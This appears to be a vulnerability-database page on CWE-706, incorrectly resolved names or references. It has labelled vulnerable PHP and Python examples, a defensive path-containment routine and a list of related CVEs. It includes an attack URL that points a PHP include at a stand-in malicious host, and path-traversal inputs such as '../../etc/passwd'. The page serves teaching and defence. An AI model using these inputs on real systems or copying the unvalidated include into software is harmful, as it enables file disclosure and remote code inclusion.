
CWE-706 (Use of Incorrectly-Resolved Name or Reference) — Vulnerability Class 36

36 vulnerabilities classified as CWE-706 (Use of Incorrectly-Resolved Name or Reference). AI-generated Chinese analysis included.

CWE-706 is an input validation weakness in which software resolves a name or reference to a resource that lies outside its intended control sphere. It typically arises when an application builds a file path, database key, or network address from a user-supplied identifier without sanitizing or validating it, so an attacker can steer the reference to an unauthorized file, record, or endpoint. Exploitation commonly takes the form of path traversal or pointer manipulation and can lead to unauthorized data access, privilege escalation, or full system compromise when operations are redirected to sensitive locations. Mitigation rests on strict input validation: every reference should be checked against a whitelist of allowed values. In addition, canonicalizing (normalizing) paths before they are resolved and applying least-privilege principles to resource access substantially reduce the attack surface and keep resolved references within the application's expected and secure operating boundaries.

MITRE CWE Description
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Common Consequences (1)
Scope: Confidentiality, Integrity · Impact: Read Application Data, Modify Application Data
Examples (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
<?php
// Deliberately vulnerable (the CWE "Bad" example): module_name is taken from the
// query string unvalidated and used directly to build the include path, so a
// remote URL or a relative path can be substituted for a module directory.
$dir = $_GET['module_name'];
include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os
import sys

def main():
    # Deliberately vulnerable (the CWE "Bad" example): the user-supplied relative
    # path is joined to the working directory with no check that the result
    # stays inside it, so ".." segments or an absolute path escape the directory.
    filename = sys.argv[1]
    path = os.path.join(os.getcwd(), filename)
    try:
        with open(path, 'r') as f:
            file_data = f.read()
    except FileNotFoundError as e:
        print("Error - file not found")

main()
Bad · Python
import os
import sys

def main():
    # The CWE "Good" example: the joined path is normalized first (collapsing
    # "." and ".." segments) and is only opened if it still lies under the
    # permitted documents directory.
    filename = sys.argv[1]
    path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}")
    if path.startswith("/home/cwe/documents/"):
        try:
            with open(path, 'r') as f:
                file_data = f.read()
        except FileNotFoundError as e:
            print("Error - file not found")

main()
Good · Python
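The following Python is an added example, not code from the MITRE entry or from this page, and it generalises the "Good" snippet above together with the whitelist advice in the summary. It assumes a constructed base directory (BASE_DIR) and a constructed set of permitted module names (ALLOWED_MODULES); the function names resolve_within, is_safe_path, read_document, safe_module_path and classify_requests are this example's own. Two points go beyond the page's snippet: paths are canonicalised with os.path.realpath (which also follows symlinks where the path exists, unlike normpath), and containment is checked with os.path.commonpath rather than a string prefix, because a prefix test without a trailing separator would accept a sibling directory such as documents_private. The module-include case from the PHP example is handled by an exact-match allowlist, so neither a URL nor a relative path can reach the include.

```python
import os

# Constructed sample values for this example (not from the page): the only
# directory the application may read from, and the modules it may include.
BASE_DIR = "/home/cwe/documents"
ALLOWED_MODULES = frozenset({"reports", "users", "billing"})


def resolve_within(base_dir, user_path):
    """Return the canonical absolute path of user_path under base_dir,
    or None when the resolved path falls outside base_dir.

    Both sides are canonicalised with os.path.realpath so that '.', '..',
    repeated separators and symlinks (where the path exists) are resolved
    before the containment check runs.
    """
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute; realpath then
    # yields e.g. '/etc/passwd', which the containment check below rejects.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares whole path components, so a sibling directory such
    # as '/home/cwe/documents_private' (which a bare startswith(base) would
    # accept) is rejected here.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_safe_path(base_dir, user_path):
    """Boolean view of resolve_within for callers that only need a verdict."""
    return resolve_within(base_dir, user_path) is not None


def read_document(base_dir, user_path):
    """Read a file only if it resolves inside base_dir. Mirrors the CWE
    example's read but returns a status string instead of printing."""
    path = resolve_within(base_dir, user_path)
    if path is None:
        return "rejected"
    try:
        with open(path, "r") as f:
            return f.read()
    except FileNotFoundError:
        return "not found"


def safe_module_path(modules_dir, module_name):
    """Allowlist resolution for the PHP-style 'module_name' include: the
    name must match one of the known modules exactly, so it can never be a
    URL, an absolute path or a '..' sequence."""
    if module_name not in ALLOWED_MODULES:
        return None
    return os.path.join(modules_dir, module_name, "function.php")


def classify_requests(base_dir, user_paths):
    """Map each request path to 'allowed' or 'rejected', for review."""
    return {p: ("allowed" if is_safe_path(base_dir, p) else "rejected")
            for p in user_paths}


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate request and four that try to
    # leave the base directory in different ways.
    samples = [
        "reports/q1.txt",
        "../../etc/passwd",
        "/etc/passwd",
        "../documents_private/secrets.txt",
        "reports/../../documents_private/x",
    ]
    for path, verdict in classify_requests(BASE_DIR, samples).items():
        print(f"{verdict:8} {path}")
    print(safe_module_path("/var/www/modules", "reports"))
    print(safe_module_path("/var/www/modules", "http://malicious.example.com"))
```

Run it directly to see each constructed request classified; only the in-directory request is allowed, and only an exact allowlisted module name yields an include path. The containment check is deliberately done on the canonical form of both the base and the candidate, so it behaves the same whether or not the base directory itself sits behind a symlink.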
CVE ID · Title · Product · CVSS · Severity · Published
CVE-2026-40912 · Traefik: StripPrefixRegex auth bypass via Path/RawPath desync · traefik · 8.2 · - · 2026-04-30
CVE-2026-41402 · OpenClaw < 2026.3.31 - Webhook Replay Cache Cross-Target messageId Scope Bypass · OpenClaw · 4.2 · Medium · 2026-04-28
CVE-2026-42254 · Hickory DNS security vulnerability · Hickory DNS · 4.0 · Medium · 2026-04-26
CVE-2026-41354 · OpenClaw < 2026.4.2 - Insufficient Scope in Zalo Webhook Replay Dedupe Keys · OpenClaw · 3.7 · Low · 2026-04-23
CVE-2026-35358 · uutils coreutils cp Semantic Loss and Potential Denial of Service with -R via Device Node Stream Reading · coreutils · 4.4 · Medium · 2026-04-22
CVE-2026-35666 · OpenClaw < 2026.3.22 - Allowlist Bypass via Unregistered Time Dispatch Wrapper · OpenClaw · 8.8 · High · 2026-04-10
CVE-2026-35635 · OpenClaw < 2026.3.22 - Webhook Path Route Replacement Vulnerability in Synology Chat · OpenClaw · 4.8 · Medium · 2026-04-09
CVE-2026-33732 · srvx is vulnerable to middleware bypass via absolute URI in request line · srvx · 4.8 · Medium · 2026-03-26
CVE-2026-33490 · h3: Missing Path Segment Boundary Check in `mount()` Causes Middleware Execution on Unrelated Prefix-Matching Routes · h3 · 3.7 · Low · 2026-03-26
CVE-2026-1230 · Use of Incorrectly-Resolved Name or Reference in GitLab · GitLab · 4.1 · Medium · 2026-03-11
CVE-2026-30856 · WeKnora: Tool Execution Hijacking via Ambiguous Naming Convention In MCP client and Indirect Prompt Injection · WeKnora · 5.9 · Medium · 2026-03-07
CVE-2026-25890 · File Browser has a Path-Based Access Control Bypass via Multiple Leading Slashes in URL · filebrowser · 8.1 · High · 2026-02-09
CVE-2026-25067 · SmarterTools SmarterMail < Build 9518 Unauthenticated background-of-the-day Path Coercion · SmarterMail · 9.8 · Critical · 2026-01-29
CVE-2025-13437 · Arbitrary node_modules Directory Deletion in Google zx · zx · 5.5 · - · 2025-11-20
CVE-2025-62378 · CommandKit exposes incorrect command name in context object for message command aliases · commandkit · 6.1 · Medium · 2025-10-15
CVE-2025-58362 · Hono contains a flaw in URL path parsing, potentially leading to path confusion · hono · 7.5 · High · 2025-09-04
CVE-2025-30357 · NamelessMC Forum Topic Deletion Triggered by Unrelated User Deletion · Nameless · 7.3 · High · 2025-04-18
CVE-2025-29914 · OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME` · coraza · 5.4 · Medium · 2025-03-20
CVE-2024-52515 · Nextcloud Server has incomplete sanitization of SVG files allows to embed other images into previews · security-advisories · 5.7 · Medium · 2024-11-15
CVE-2024-51746 · Use of incorrect Rekor entries during verification in gitsign · gitsign · 6.5 · - · 2024-11-05
CVE-2024-45305 · gix-path uses local config across repos when it is the highest scope · gitoxide · 2.5 · Low · 2024-09-02
CVE-2024-35198 · TorchServe bypass allowed_urls configuration · serve · 9.8 · Critical · 2024-07-18
CVE-2023-42125 · Avast Premium Security Sandbox Protection Link Following Privilege Escalation Vulnerability · Premium Security · 7.8 · - · 2024-05-03
CVE-2024-27295 · Directus MySQL accent insensitive email matching · directus · 8.2 · High · 2024-03-01
CVE-2024-27292 · Docassemble unauthorized access through URL manipulation · docassemble · 7.5 · High · 2024-02-29
CVE-2023-42451 · Mastodon Invalid Domain Name Normalization vulnerability · mastodon · 7.4 · High · 2023-09-19
CVE-2023-28643 · Potential share collision for recipients when caching is enabled in nextcloud server · security-advisories · 5.5 · Medium · 2023-03-30
CVE-2023-28628 · `authority-regex` returns the wrong authority in lambdaisland/uri · uri · 5.4 · Medium · 2023-03-27
CVE-2022-31089 · Invalid file request can crash parse-server · parse-server · 7.5 · High · 2022-06-27
CVE-2022-27778 · curl security vulnerability · https://github.com/curl/curl · 8.1 · - · 2022-06-01

Vulnerabilities classified as CWE-706 (Use of Incorrectly-Resolved Name or Reference) account for 36 CVEs. The CWE taxonomy describes the weakness; review the individual CVEs for product-specific impact.